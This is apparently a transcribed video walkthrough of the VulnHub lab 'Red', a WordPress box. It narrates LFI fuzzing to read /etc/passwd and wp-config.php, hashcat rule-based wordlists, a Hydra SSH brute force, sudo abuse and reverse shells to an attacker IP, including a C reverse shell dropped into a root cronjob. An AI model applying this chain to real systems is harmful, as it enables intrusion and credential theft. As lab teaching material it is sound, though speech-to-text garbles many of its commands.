Yo, what's going on, guys? In this video, we're going to be doing red one for VulnHub. This is a box word about easy. And yeah, let's get on to the video. Alright, I'm going to start splitting my terminals here. I'm going to start running a netdiscover mystar 10.0.0.1/24/IT0. Doing this would do the IP of the box 10.0.0.223. So I'm going to start by running nmap scan. So do nmap -c for default scripts, -v for enumeration, and just count out ports in the IP. Doing this, I'm going to do -v verbose. Look at the port, we do have port 20 open for SSH and also port 80 open for HTTP, right? So I'm going to start visiting port 80. Visiting port 80, it does seem like we've been hacked by red. And it also does seem like we do have a WordPress site, right? Just to confirm that, I'm going to do Control U and type in WordPress. And it does seem like we are running WordPress 5.8.1, right? So I'm going to start by doing enumeration and running a gobuster. So I'll do gobuster dir mode -2 went to the IP address -w for /user share wordlist. We'll do gobuster directory list to be the medium.txt. We'll do extensions as HTML, TXT, and also PHP. Looking at the ports, we do have port 20 open for SSH. It's running a Ubuntu. This is a Ubuntu server. We do have port 80 open for HTTP, and this is running Apache. We also do have a robots.txt, which is wp-admin, right? Doing this, since look at the header, it does seem like we've been hacked by red. They did also leave us a backdoor, right? So doing this, I'm going to start by searching for like seclists. I'm just going to go to discovery. We'll just go to web content. I'll do Control F and do backdoor. This seems like we have a backdoor for ASP, JSP, PHP, and also PL. So I'm just going to go to PHP. I'm just going to go to raw data, copy this, and wget this on my machine. So I'll do Control Shift Z. So we're clearing our terminals here. I'm going to wget this. Now we do have our comment backdoors -php, right? So I'm going to start by using gobuster dir mode -u. I'm just going to answer the host name here. So we'll copy that. I'm just going to cancel this. We'll do -w for common. And I'm just not going to specify any extensions because this already does have extensions as .php, right? Looking at this, it doesn't seem like we do get anything. So I'm going to do -s. And start by specifying 500 for the status code. It does seem like we do get a network file manager php.php, so I'm just going to copy this. We'll just enter that in there. I'm going to do Control U to view the source code. It doesn't seem like we do get anything, right? So I'm just going to copy this and start by using wfuzz. I'm going to clear my terminals here, use wfuzz. So I can fuzz for a parameter, right? So let me zoom out. I'm going to do $fuzz, where we're going to fuzz for the parameter. We'll do /etc password. I'll do -w for /user share word list. I'm just going to do like lfi params.txt. We'll do -hw so we can opt out for the word. And we can just let this run, right? Alright, so it does seem like we do get some characters here, which is 1966. And the payload is key, right? So I'm just going to do like $key. I'm just going to code this to like /etc password. And it does seem like we do get an LFI, right? Since we do have an LFI, we just did we did view the file for /etc password. I'm just going to start by running a bin/bash so we can see what users we do have on the machine, right? We do have a user as John, IPsec, and also OXDF. Doing this, I'm just going to go under /home. We do have a user as IPsec. I'm just going to go to .ssh and do ID_RSA. I'm also going to check for the user as John. So I'll do John. Doesn't seem to work. I'm also going to check for OXDF. It doesn't seem like we do have any private keys, right? Also doing this, I also want to do check for wp-config.php since it is the configuration file for WordPress, right? It doesn't seem to work since we do need a filter, right? So I'm just going to go to payload all the things. I'm just going to go here. I'm just going to go to file inclusion. Let's see if we can go to PHP filter. Here's some wrappers that we can use so we can convert this to base64 and then decode it with CyberChef, right? So I'm just going to copy this. I'll put this in here. We can take off our index.php. So we just delete that. And you do see that it does convert the wp config to base64, right? So doing this, I'm just going to go to CyberChef. I'm just going to search it up from. We'll do this from base 64. Put this in here. And we do get the wp-config.php file, right? We do have a database name as WordPress, database user as John, also database password as this, right? So I'm just going to copy this and see if this works for the user that we did enumerate for. So I'm just going to go under slash. I believe we did have user as, let's see, we did have a user as administrator. So I'm just copy this. I'm going to go to slash login. And we did have a password as this, right? See if this works. And it doesn't seem to work, right? I'm also going to check, I'm started by checking for, we did have a .php file as network file manager.php. So I'm just going to copy this, put this in here, copy this, put this into CyberChef. And this seems like we do have, it does include the file, so we can get files from the server for the key parameter, which we did fuzz for. And we can just copy this, right? It does seem like we do have base 64. And it does seem like we do need to use hashcat, right? It is showing that hashcat says rules are rules. So I'm guessing they're talking about, we do need to use hashcat rules, right? To do that, we need to start by making a pass.txt. We did know that we did have the password. So I'm just going to copy this, which is for wp-config.php. Put this in here. I'm just going to copy this, put this in here, and right quit. And I believe the rules are under slash user share hashcat. I believe they're under rules. And we do have the .rule file here, right? Basically, we can use -r for hashcat. So we can specify a rule. I'm just going to be using the first one, which is best64.rule. Since we do have a password, we're going to be using those rules to create a word list. So we can start by brute forcing, right? So doing this, we're going to start by using hashcat. So we're going to use hashcat. We start by specifying -force. We'll start by specifying pass.txt. We'll do -r so we can specify the rule, which is under user share hashcat. We'll do rules, and we're going to be using best64.rule, right? We'll do -std out, and we'll output this to a wordlist.txt, right? So now we do have our, if we cat our wordlist.txt, you do see that we do have the string that we had followed by the rule, right? So to just make, we did use the best rule 64.rule to create a word list, right? Since we did have a LFI, we did check for the user as IPSC, John, and also OXDF. I'm going to start by brute forcing, right? So to use Hydra myself, I'm just going to start by brute forcing for the user John. We'll do -p, which is going to be wordless. We'll do SSH. We'll do 10.0.0.223 on port 22. And I'm going to do -iso to restore the session. It does seem like we do get a password for John, right? So my SSH into John, we'll do at 10.0.0.223. And it does seem like we do get long access, right? So I'm going to do ID. I'm also going to start by running a sudo -l. It does seem like we run user bin time as IPSC. So I'm going to do sudo. We'll run this as root. We'll run this as IPSC, user bin time. I'm just going to run a bin/bash, right? So we'll do cd. And now we are under the user as IPSC, right? All right, so now we are under the user as IPSC. It does seem like there's a cronjob running since it keeps outputting text. And also the cronjob is also going to kick us out of this user, right? It's also going to change the password. Just to prevent this, I'm going to go under /dev shm. So I'm going to clear my terminals here. I'm just going to nano into, shell.sh. I'm just going to go to payload all things here. I'll just go to payload all the things. We'll go to rev shell. I'm just going to do Control F and do bash. I'm just going to copy this. Put this in here. We'll do 10.0.069 on port 9001. I'm going to be using tag since cat is replaced with vim, right? So we do have 10.0.069 on port 9001. So I'm going to do chmod plus x for. So we'll do chmod plus x for shell.sh. We'll just run shell.sh. I'm going to start my listener here. So I'll do all wrap netcat -l on 9001. Press on this, and we do get a connect, right? So doing this, I'm going to start by spawning a TTY. So I'll do Python 3 -c. We'll start by importing pty.spawn. We'll start by running a bin/bash on here. We can do Control Z. Control Z. We can do stty raw minus echo. We can just foreground this, right? Now we can start by exporting my term is equal to xterm. And now if red tries to kick us off, we will have a percentage shell on our side, right? So I'm just going to go under /dev/shm. And we did have our shell there, right? So I'm just going to cd into var. So we're doing some manual enumeration, cd into var, dub. We went to WordPress. I'm just going to do the else minus LA. It does seem like we do have a .git, which is owned by root and also ipsec. So do else minus LA. And it does seem like we have a super secret file uc.c. So I'm just going to tag this out. And it does seem like it's a cronjob, right? Since we did receive this message that's being outputted on the terminal, it's obviously just a cronjob, right? So I'm just going to remove -r for this. I'll just remove that. I'm just going to copy this file name so we can put our own C file in here. So it does seem like this is going to just compile this C file into rev. If I do run rev, you do see that it does run. It just prints out the text, right? And also does print out the text as it is compiled here, right? So doing this, it does seem like we were kicked off, as you did see, but we still have a shell, right? As ipsec. So I'm just going to go under / what is var again? So it's var www HTML or var www WordPress. We'll cd into .git. And I'm just going to remove -r for rev. And start by making my own C file, right? So I'm clearing my terminals here. I'm just going to vi into this file name. And here I'm just going to go to revshells.com. So revshells.com. And here we can start by putting our IP address 10.0.069.9.9001. Alright, so it doesn't seem like it does show like the payloads that we can use or anything. Not sure why. So all I did was already copy this from my real machine. I just copied the code. You do see that we do have the integer port as 9001. And also the inet underscore address as 10.0.069, right? So I'm just going to right quit. I'm starting by Python server. So do Python 3 -m http.server on port 8081. And doing this, we can start by using wget. So I'll do wget http 10.0.069 on port 8081. And we just need to get our secret file uc.c, right? We'll do else minus LA. And you do see that we do have our file in here, right? So all the cron job is going to do is compile our super secret file uc.c. It's going to output it to rev and run that rev file, right? So what we need to do is start our looper listener. So we'll do all wrap netcam MVP on 9001. And doing this, we can just wait about 2 minutes and we should get a root or shell, right? Alright, so after a couple of minutes, you do see that we do get a connect. So I'm going to do ID. And you do see that we're going to root. So I'm cd into root alice. We can cat. So we can tag our root.txt, right? Well, guys, that's pretty much in the video. Don't forget to like and subscribe. And I'll catch you guys in the next one. Peace.